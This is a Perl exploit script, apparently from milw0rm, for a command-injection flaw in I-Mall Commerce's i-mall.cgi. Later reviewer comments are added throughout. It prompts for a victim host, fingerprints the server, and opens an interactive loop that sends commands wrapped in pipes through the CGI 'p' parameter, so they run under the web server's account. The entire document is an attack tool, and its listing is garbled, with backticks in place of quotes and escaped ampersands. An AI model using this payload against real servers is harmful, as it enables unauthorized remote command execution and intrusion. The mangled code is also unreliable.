I-Mall Commerce (i-mall.cgi) Remote Command Execution Exploit
##############################################
# I-Mall exploit
# Spawn bash style Shell with webserver uid
# Greetz z\, spax, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
# File-scoped state shared by every sub below. Nothing is passed as
# arguments; each sub reads and writes these directly.
# NOTE(review): the quoting in this listing is mangled — backticks appear
# where string quotes were intended and `&amp;` where `&` was — so the code
# as shown does not execute as written.
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
# Request-path table. Slot 1 is the built-in path; connect() appends the
# command and then $shiz (`|`, set in host()), so the CGI parameter value
# sent on the wire is `|<command>|`. That request shape is what shows up
# in a web server's access log when this tool is run.
$U[1] = `/i-mall/i-mall.cgi?p=|`;
# Main flow: banner and prompts, probe, URL selection, interactive loop,
# then the custom exit sub.
&amp;intro;
&amp;scan;
&amp;choose;
&amp;command;
&amp;exit; 
# Start-up sequence: print the usage banner, prompt for host and port,
# probe the server banner, then pause one second before returning.
sub intro {
&amp;help;
&amp;host;
&amp;server;
sleep 1;
};
# Prompt for the target host and port and store them in the globals.
# An empty host falls back to 127.0.0.1; a port that is empty or contains
# any non-digit falls back to 80. Also sets $shiz, the `|` that connect()
# appends after every command.
sub host {
print `\nHost or IP : `;
$host=<STDIN>;
chomp $host;
if ($host eq ``){$host=`127.0.0.1`};
$shiz = `|`;
print `\nPort (enter to accept 80): `;
$port=<STDIN>;
chomp $port;
# Non-digit check runs first, so "80abc" becomes 80 here rather than below.
if ($port =~/\D/ ){$port=`80`};
if ($port eq `` ) {$port = `80`};
};	
# Server-type probe: sets $probe to `string` so connect() sends `HEAD /`,
# then looks for the literal (case-sensitive) substring "apache" in the
# first eleven lines of @results. Prints "OK" when it is found.
sub server {
my $X;
print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`;
$probe = `string`;
my $output;
my $webserver = `something`;
&amp;connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/apache/){ $webserver = `apache` };
	};
};
if ($webserver ne `apache`){
# $choice is fixed to `y`, so the exit branch below can never be taken;
# presumably a STDIN prompt was removed here — confirm against the original.
my $choice = `y`;
chomp $choice;
if ($choice =~/N/i) {&amp;exit};
            }else{
print `\n\nOK`;
	};		
};  
# Vulnerability probe: for each path in @U (from index 1, so slot 0 filled
# by other() is never tried) send the command `dir` via connect() and mark
# the target vulnerable if any response line contains "Directory".
# The per-path branches and the final not_vulnerable branch are empty, so
# the outcome is computed but never reported to the user.
sub scan {
my $status = `not_vulnerable`;
print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`;
my $loop;
my $output;
my $flag;
# NOTE(review): `dir` with a "Directory" match presumably targets a
# Windows-style listing; on a Unix host this check would rarely match.
$command=`dir`;
for ($loop=1; $loop < @U; $loop++) { 
$flag = `0`;
$url = $U[$loop];
$probe = `scan`;
&amp;connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = `1`;
			      $status = `vulnerable`;
			      };
	};
# Both branches intentionally empty in this listing.
if ($flag eq `0`) { 
}else{
     };
};
if ($status eq `not_vulnerable`){

				};
}; 
# Select the active request path from @U. $choice is hard-coded to `1`,
# so the range check, the non-digit check and the `other` fallback are all
# dead code and $url always becomes $U[1].
sub choose {

my $choice=`1`;
chomp $choice;
if ($choice > @U){ &amp;choose };
if ($choice =~/\D/g ){ &amp;choose };
if ($choice == 0){ &amp;other };
$url = $U[$choice];
}; 
# Read a user-supplied request path from STDIN into slot 0 of the URL
# table. Only choose() could route here, and scan() starts at index 1,
# so this slot is not probed by scan().
sub other {
    chomp(my $custom_path = <STDIN>);
    $U[0] = $custom_path;
};
# Interactive loop: read a line, dispatch the built-in keywords, otherwise
# URL-encode whitespace as `+` and send it through connect().
# Keyword checks are unanchored substring matches, so any input that merely
# contains "quit", "url", "scan" or "help" is intercepted. The first four
# checks are case-insensitive but the final guard is not, so e.g. `URL`
# runs choose() and then still falls through to connect().
sub command {
while ($command !~/quit/i) {
print `[$host]\$ `;
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &amp;exit };
if ($command =~/url/i) { &amp;choose }; 
if ($command =~/scan/i) { &amp;scan };
if ($command =~/help/i) { &amp;help };
$command =~ s/\s/+/g; 
$probe = `command`;
if ($command !~/quit|url|scan|help/) {&amp;connect};
};
&amp;exit;
};  
# Open a TCP connection to $host:$port and send one HTTP request chosen by
# $probe: `command`/`scan` send `GET $url$command$shiz`, `string` sends
# `HEAD /`. The response is collected into @results and, for `command`
# and `string`, passed to output().
# Named after a Perl builtin; callers use the `&` sigil, which is what
# reaches this sub rather than the builtin.
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => `tcp`,
				PeerAddr => `$host`,
				PeerPort => `$port`,
				) or die `\nSorry UNABLE TO CONNECT To $host On Port $port.\n`;
$connection -> autoflush(1);
if ($probe =~/command|scan/){
# With $U[1] and $shiz this is `GET /i-mall/i-mall.cgi?p=|<cmd>| HTTP/1.1`,
# i.e. the request line a log review would reveal.
# NOTE(review): HTTP/1.1 without `Connection: close` — presumably relies on
# the server closing the socket; may block on keep-alive servers, confirm.
print $connection `GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n`;
}elsif ($probe =~/string/) {
print $connection `HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n`;
};

# The loop condition consumes and discards the first line (the HTTP status
# line); the body then slurps every remaining line, so the loop runs once.
while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
# `scan` results are left in @results for scan() to inspect, not printed.
if ($probe eq `command`){ &amp;output };
if ($probe eq `string`){ &amp;output };
};  
# Print the collected response: only the first eleven lines (indices 0..10,
# skipping undefined slots) for the `string` probe, every line otherwise.
sub output{
my $display;
if ($probe eq `string`) {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print `$display`;};
				};
			}else{
			foreach $display (@results){
			    print `$display`;
				};
                          };
};  
# Print a sign-off and terminate the script. The bare `exit;` inside is
# the builtin — defining a sub of the same name does not override it — so
# this sub is only reached through the `&exit` calls elsewhere in the file.
sub exit{
print `\n\n\n ORP`;
exit;
};
# Print the usage banner: advisory reference, version string, and the
# host/command prompts the interactive loop understands.
sub help {
print `\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`;
print `\n
        I-Mall E-Commerce Software i-mall.cgi 
        Command Execution Vulnerability by SPABAM 2004` ;
print `\n http://www.zone-h.org/advisories/read/id=4904
`;
print `\n I-Mall Exploit v0.99beta18`;
print `\n \n note.. web directory is normally /var/www/html`;
print `\n`;
print `\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)`;
print `\n Command: SCAN URL HELP QUIT`;
print `\n\n\n\n\n\n\n\n\n\n\n`;
};

# milw0rm.com [2005-05-04]
